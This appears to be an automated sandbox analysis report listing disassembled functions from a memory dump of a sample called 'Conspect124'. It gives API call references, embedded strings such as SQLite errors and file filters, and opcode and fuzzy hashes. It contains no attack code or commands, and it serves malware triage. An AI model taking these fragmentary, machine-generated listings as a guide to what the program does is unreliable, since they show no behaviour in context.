                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf
                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                      • API String ID: 3473751417-2880344631
                                      • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                      • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: wcscat$_snwprintfmemset
                                      • String ID: %2.2X
                                      • API String ID: 2521778956-791839006
                                      • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                      • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _snwprintfwcscpy
                                      • String ID: dialog_%d$general$menu_%d$strings
                                      • API String ID: 999028693-502967061
                                      • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                      • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                      • API String ID: 2221118986-1606337402
                                      • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                      • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                      APIs
                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                        • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                        • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                      • memset.MSVCRT ref: 0040C439
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                      • _wcsupr.MSVCRT ref: 0040C481
                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                      • memset.MSVCRT ref: 0040C4D0
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                      • String ID:
                                      • API String ID: 4131475296-0
                                      • Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                      • Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                      APIs
                                      • memset.MSVCRT ref: 004116FF
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                      • API String ID: 2618321458-3614832568
                                      • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                      • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AttributesFilefreememset
                                      • String ID:
                                      • API String ID: 2507021081-0
                                      • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                      • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                      APIs
                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                      • malloc.MSVCRT ref: 00417524
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                      • free.MSVCRT ref: 00417544
                                      • free.MSVCRT ref: 00417562
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                      • String ID:
                                      • API String ID: 4131324427-0
                                      • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                      • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                      APIs
                                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                      • free.MSVCRT ref: 0041822B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: PathTemp$free
                                      • String ID: %s\etilqs_$etilqs_
                                      • API String ID: 924794160-1420421710
                                      • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                      • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                      APIs
                                      • wcscpy.MSVCRT ref: 0041477F
                                      • wcscpy.MSVCRT ref: 0041479A
                                      • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                      • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: wcscpy$CloseCreateFileHandle
                                      • String ID: General
                                      • API String ID: 999786162-26480598
                                      • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                      • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                      • _snwprintf.MSVCRT ref: 0040977D
                                      • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ErrorLastMessage_snwprintf
                                      • String ID: Error$Error %d: %s
                                      • API String ID: 313946961-1552265934
                                      • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                      • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: foreign key constraint failed$new$oid$old
                                      • API String ID: 0-1953309616
                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                      APIs
                                      Strings
                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                      • API String ID: 3510742995-272990098
                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                      APIs
                                      • memset.MSVCRT ref: 0044A6EB
                                      • memset.MSVCRT ref: 0044A6FB
                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: gj
                                      • API String ID: 1297977491-4203073231
                                      • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                      • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                      APIs
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                      • free.MSVCRT ref: 0040E9D3
                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??3@$free
                                      • String ID:
                                      • API String ID: 2241099983-0
                                      • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                      • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                      APIs
                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                      • malloc.MSVCRT ref: 004174BD
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                      • free.MSVCRT ref: 004174E4
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                      • String ID:
                                      • API String ID: 4053608372-0
                                      • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                      • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                      APIs
                                      • GetParent.USER32(?), ref: 0040D453
                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Window$Rect$ClientParentPoints
                                      • String ID:
                                      • API String ID: 4247780290-0
                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                      APIs
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                      • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                      • memset.MSVCRT ref: 004450CD
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                      • String ID:
                                      • API String ID: 1471605966-0
                                      • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                      • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                      APIs
